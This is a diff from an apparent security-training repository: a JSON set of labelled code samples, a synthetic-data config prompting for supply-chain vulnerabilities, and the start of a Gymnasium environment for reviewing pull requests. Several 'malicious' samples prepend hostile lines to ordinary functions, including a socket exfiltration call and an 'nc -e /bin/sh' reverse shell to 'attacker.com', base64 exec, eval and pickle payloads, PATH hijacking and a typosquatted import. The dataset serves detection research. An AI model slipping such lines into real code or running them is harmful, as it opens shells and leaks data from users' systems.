| 116 |
+
"patch": null,
|
| 117 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 118 |
+
"label": "benign",
|
| 119 |
+
"source": "mutation_engine",
|
| 120 |
+
"attack_type": null
|
| 121 |
+
},
|
| 122 |
+
{
|
| 123 |
+
"id": "tp_dd51805d",
|
| 124 |
+
"type": "true_positive",
|
| 125 |
+
"code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 126 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 127 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 128 |
+
"label": "malicious",
|
| 129 |
+
"source": "mutation_engine",
|
| 130 |
+
"attack_type": "obfuscated_exec"
|
| 131 |
+
},
|
| 132 |
+
{
|
| 133 |
+
"id": "tp_82f7c7df",
|
| 134 |
+
"type": "true_positive",
|
| 135 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 136 |
+
"patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 137 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 138 |
+
"label": "malicious",
|
| 139 |
+
"source": "mutation_engine",
|
| 140 |
+
"attack_type": "env_hijack"
|
| 141 |
+
},
|
| 142 |
+
{
|
| 143 |
+
"id": "tp_4112a517",
|
| 144 |
+
"type": "true_positive",
|
| 145 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 146 |
+
"patch": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 147 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 148 |
+
"label": "malicious",
|
| 149 |
+
"source": "mutation_engine",
|
| 150 |
+
"attack_type": "socket_exfil"
|
| 151 |
+
},
|
| 152 |
+
{
|
| 153 |
+
"id": "fp_1a5da2e5",
|
| 154 |
+
"type": "false_positive",
|
| 155 |
+
"code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 156 |
+
"patch": null,
|
| 157 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 158 |
+
"label": "benign",
|
| 159 |
+
"source": "mutation_engine",
|
| 160 |
+
"attack_type": null
|
| 161 |
+
},
|
| 162 |
+
{
|
| 163 |
+
"id": "tp_3fa65759",
|
| 164 |
+
"type": "true_positive",
|
| 165 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 166 |
+
"patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 167 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 168 |
+
"label": "malicious",
|
| 169 |
+
"source": "mutation_engine",
|
| 170 |
+
"attack_type": "socket_exfil"
|
| 171 |
+
},
|
| 172 |
+
{
|
| 173 |
+
"id": "fn_c40125ae",
|
| 174 |
+
"type": "functional",
|
| 175 |
+
"code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 176 |
+
"patch": null,
|
| 177 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 178 |
+
"label": "benign",
|
| 179 |
+
"source": "mutation_engine",
|
| 180 |
+
"attack_type": null
|
| 181 |
+
},
|
| 182 |
+
{
|
| 183 |
+
"id": "tp_7ac28ccc",
|
| 184 |
+
"type": "true_positive",
|
| 185 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 186 |
+
"patch": "def format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 187 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 188 |
+
"label": "malicious",
|
| 189 |
+
"source": "mutation_engine",
|
| 190 |
+
"attack_type": "eval_hidden"
|
| 191 |
+
},
|
| 192 |
+
{
|
| 193 |
+
"id": "tp_e1848067",
|
| 194 |
+
"type": "true_positive",
|
| 195 |
+
"code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 196 |
+
"patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 197 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 198 |
+
"label": "malicious",
|
| 199 |
+
"source": "mutation_engine",
|
| 200 |
+
"attack_type": "pickle_deserialization"
|
| 201 |
+
},
|
| 202 |
+
{
|
| 203 |
+
"id": "fp_382449d8",
|
| 204 |
+
"type": "false_positive",
|
| 205 |
+
"code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 206 |
+
"patch": null,
|
| 207 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 208 |
+
"label": "benign",
|
| 209 |
+
"source": "mutation_engine",
|
| 210 |
+
"attack_type": null
|
| 211 |
+
},
|
| 212 |
+
{
|
| 213 |
+
"id": "fp_5448737e",
|
| 214 |
+
"type": "false_positive",
|
| 215 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
|
| 216 |
+
"patch": null,
|
| 217 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 218 |
+
"label": "benign",
|
| 219 |
+
"source": "mutation_engine",
|
| 220 |
+
"attack_type": null
|
| 221 |
+
},
|
| 222 |
+
{
|
| 223 |
+
"id": "tp_067c7620",
|
| 224 |
+
"type": "true_positive",
|
| 225 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 226 |
+
"patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 227 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 228 |
+
"label": "malicious",
|
| 229 |
+
"source": "mutation_engine",
|
| 230 |
+
"attack_type": "malicious_import"
|
| 231 |
+
},
|
| 232 |
+
{
|
| 233 |
+
"id": "tp_30239b19",
|
| 234 |
+
"type": "true_positive",
|
| 235 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 236 |
+
"patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 237 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 238 |
+
"label": "malicious",
|
| 239 |
+
"source": "mutation_engine",
|
| 240 |
+
"attack_type": "malicious_import"
|
| 241 |
+
},
|
| 242 |
+
{
|
| 243 |
+
"id": "fn_cf514ff8",
|
| 244 |
+
"type": "functional",
|
| 245 |
+
"code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
|
| 246 |
+
"patch": null,
|
| 247 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 248 |
+
"label": "benign",
|
| 249 |
+
"source": "mutation_engine",
|
| 250 |
+
"attack_type": null
|
| 251 |
+
},
|
| 252 |
+
{
|
| 253 |
+
"id": "tp_b9c23fd5",
|
| 254 |
+
"type": "true_positive",
|
| 255 |
+
"code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 256 |
+
"patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 257 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 258 |
+
"label": "malicious",
|
| 259 |
+
"source": "mutation_engine",
|
| 260 |
+
"attack_type": "typosquatting"
|
| 261 |
+
},
|
| 262 |
+
{
|
| 263 |
+
"id": "tp_18963f71",
|
| 264 |
+
"type": "true_positive",
|
| 265 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 266 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 267 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 268 |
+
"label": "malicious",
|
| 269 |
+
"source": "mutation_engine",
|
| 270 |
+
"attack_type": "eval_hidden"
|
| 271 |
+
},
|
| 272 |
+
{
|
| 273 |
+
"id": "tp_4c4f927a",
|
| 274 |
+
"type": "true_positive",
|
| 275 |
+
"code_snippet": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 276 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 277 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 278 |
+
"label": "malicious",
|
| 279 |
+
"source": "mutation_engine",
|
| 280 |
+
"attack_type": "subprocess_backdoor"
|
| 281 |
+
},
|
| 282 |
+
{
|
| 283 |
+
"id": "tp_4ea9d228",
|
| 284 |
+
"type": "true_positive",
|
| 285 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 286 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 287 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 288 |
+
"label": "malicious",
|
| 289 |
+
"source": "mutation_engine",
|
| 290 |
+
"attack_type": "env_hijack"
|
| 291 |
+
},
|
| 292 |
+
{
|
| 293 |
+
"id": "tp_f417c9df",
|
| 294 |
+
"type": "true_positive",
|
| 295 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
|
| 296 |
+
"patch": "def is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
|
| 297 |
+
"unit_test_code": "import code\nassert code.is_prime(7) == True\n",
|
| 298 |
+
"label": "malicious",
|
| 299 |
+
"source": "mutation_engine",
|
| 300 |
+
"attack_type": "env_hijack"
|
| 301 |
+
},
|
| 302 |
+
{
|
| 303 |
+
"id": "tp_bde0820e",
|
| 304 |
+
"type": "true_positive",
|
| 305 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
|
| 306 |
+
"patch": "def parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
|
| 307 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 308 |
+
"label": "malicious",
|
| 309 |
+
"source": "mutation_engine",
|
| 310 |
+
"attack_type": "env_hijack"
|
| 311 |
+
},
|
| 312 |
+
{
|
| 313 |
+
"id": "fn_d6a7e145",
|
| 314 |
+
"type": "functional",
|
| 315 |
+
"code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
|
| 316 |
+
"patch": null,
|
| 317 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 318 |
+
"label": "benign",
|
| 319 |
+
"source": "mutation_engine",
|
| 320 |
+
"attack_type": null
|
| 321 |
+
},
|
| 322 |
+
{
|
| 323 |
+
"id": "tp_69568e28",
|
| 324 |
+
"type": "true_positive",
|
| 325 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 326 |
+
"patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
|
| 327 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 328 |
+
"label": "malicious",
|
| 329 |
+
"source": "mutation_engine",
|
| 330 |
+
"attack_type": "socket_exfil"
|
| 331 |
+
},
|
| 332 |
+
{
|
| 333 |
+
"id": "fn_7abd4b1e",
|
| 334 |
+
"type": "functional",
|
| 335 |
+
"code_snippet": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
|
| 336 |
+
"patch": null,
|
| 337 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 338 |
+
"label": "benign",
|
| 339 |
+
"source": "mutation_engine",
|
| 340 |
+
"attack_type": null
|
| 341 |
+
},
|
| 342 |
+
{
|
| 343 |
+
"id": "fp_56b026a4",
|
| 344 |
+
"type": "false_positive",
|
| 345 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n \"\"\"Parse simple log lines into level and message.\"\"\"\n parsed = []\n for line in log_lines:\n parts = line.split(' - ', 1)\n if len(parts) == 2:\n parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n return parsed",
|
| 346 |
+
"patch": null,
|
| 347 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 348 |
+
"label": "benign",
|
| 349 |
+
"source": "mutation_engine",
|
| 350 |
+
"attack_type": null
|
| 351 |
+
},
|
| 352 |
+
{
|
| 353 |
+
"id": "fn_9691b992",
|
| 354 |
+
"type": "functional",
|
| 355 |
+
"code_snippet": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 356 |
+
"patch": null,
|
| 357 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 358 |
+
"label": "benign",
|
| 359 |
+
"source": "mutation_engine",
|
| 360 |
+
"attack_type": null
|
| 361 |
+
},
|
| 362 |
+
{
|
| 363 |
+
"id": "fp_477c7ba9",
|
| 364 |
+
"type": "false_positive",
|
| 365 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 366 |
+
"patch": null,
|
| 367 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 368 |
+
"label": "benign",
|
| 369 |
+
"source": "mutation_engine",
|
| 370 |
+
"attack_type": null
|
| 371 |
+
},
|
| 372 |
+
{
|
| 373 |
+
"id": "fp_f65258dd",
|
| 374 |
+
"type": "false_positive",
|
| 375 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef celsius_to_fahrenheit(c):\n \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n return (f - 32) * 5/9",
|
| 376 |
+
"patch": null,
|
| 377 |
+
"unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
|
| 378 |
+
"label": "benign",
|
| 379 |
+
"source": "mutation_engine",
|
| 380 |
+
"attack_type": null
|
| 381 |
+
},
|
| 382 |
+
{
|
| 383 |
+
"id": "fn_7ed224be",
|
| 384 |
+
"type": "functional",
|
| 385 |
+
"code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 386 |
+
"patch": null,
|
| 387 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 388 |
+
"label": "benign",
|
| 389 |
+
"source": "mutation_engine",
|
| 390 |
+
"attack_type": null
|
| 391 |
+
},
|
| 392 |
+
{
|
| 393 |
+
"id": "tp_6523f26b",
|
| 394 |
+
"type": "true_positive",
|
| 395 |
+
"code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 396 |
+
"patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
|
| 397 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 398 |
+
"label": "malicious",
|
| 399 |
+
"source": "mutation_engine",
|
| 400 |
+
"attack_type": "eval_hidden"
|
| 401 |
+
}
|
| 402 |
+
]
|
sentinel_synth/data/sdk_config.yaml
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Meta Synthetic Data Kit Configuration for Sentinel-Synth
|
| 2 |
+
# This file defines how the SDK should generate synthetic vulnerabilities.
|
| 3 |
+
|
| 4 |
+
vllm:
|
| 5 |
+
api_base: "http://localhost:8000/v1"
|
| 6 |
+
model: "meta-llama/Llama-3.1-8B-Instruct"
|
| 7 |
+
|
| 8 |
+
generation:
|
| 9 |
+
temperature: 0.8
|
| 10 |
+
top_p: 0.95
|
| 11 |
+
max_tokens: 1024
|
| 12 |
+
num_pairs: 5 # Number of examples per ingest chunk
|
| 13 |
+
|
| 14 |
+
prompts:
|
| 15 |
+
# Standard prompt for generating malicious supply-chain code
|
| 16 |
+
code_generation: |
|
| 17 |
+
You are a cybersecurity research assistant specializing in supply-chain security.
|
| 18 |
+
Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
|
| 19 |
+
The vulnerability should be one of:
|
| 20 |
+
- Typosquatting (importing a malicious package similar to a popular one)
|
| 21 |
+
- Obfuscated execution (exec/eval with base64/zlib encoding)
|
| 22 |
+
- Environment hijacking (modifying PATH or other critical env vars)
|
| 23 |
+
- Subprocess backdoors (reverse shells or hidden command execution)
|
| 24 |
+
- Malicious __import__ tricks
|
| 25 |
+
|
| 26 |
+
After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
|
| 27 |
+
Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
|
| 28 |
+
|
| 29 |
+
Format the output as a JSON object with keys:
|
| 30 |
+
- code_snippet: the vulnerable code
|
| 31 |
+
- patch: the fixed code
|
| 32 |
+
- unit_test_code: the validation test
|
| 33 |
+
- attack_type: the category of the attack
|
sentinel_synth/envs/__init__.py
ADDED
|
File without changes
|
sentinel_synth/envs/sentinel_env.py
ADDED
|
@@ -0,0 +1,175 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import gymnasium as gym
|
| 2 |
+
from gymnasium import spaces
|
| 3 |
+
import json
|
| 4 |
+
import numpy as np
|
| 5 |
+
from pathlib import Path
|
| 6 |
+
import random
|
| 7 |
+
|
| 8 |
+
from ..validation.docker_runner import run_code
|
| 9 |
+
from ..validation.patch_validator import validate_patch
|
| 10 |
+
|
| 11 |
+
class SentinelEnv(gym.Env):
|
| 12 |
+
"""
|
| 13 |
+
Gymnasium environment for Sentinel-Synth
|
| 14 |
+
"""
|
| 15 |
+
metadata = {"render_modes": ["human"]}
|
| 16 |
+
|
| 17 |
+
ACTION_ANALYZE = 0
|
| 18 |
+
ACTION_EXECUTE_SANDBOX = 1
|
| 19 |
+
ACTION_BLOCK_PR = 2
|
| 20 |
+
ACTION_SUBMIT_PATCH = 3
|
| 21 |
+
ACTION_REQUEST_REVIEW = 4
|
| 22 |
+
|
| 23 |
+
def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
|
| 24 |
+
super().__init__()
|
| 25 |
+
|
| 26 |
+
self.use_docker = use_docker
|
| 27 |
+
self.scenarios_path = scenarios_path
|
| 28 |
+
self.scenarios = self._load_scenarios()
|
| 29 |
+
|
| 30 |
+
self.current_scenario = None
|
| 31 |
+
self.step_counter = 0
|
| 32 |
+
self.max_steps = 5
|
| 33 |
+
|
| 34 |
+
# Define Observation Space
|
| 35 |
+
# text max length 5000 chars
|
| 36 |
+
self.observation_space = spaces.Dict(
|
| 37 |
+
{
|
| 38 |
+
"code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
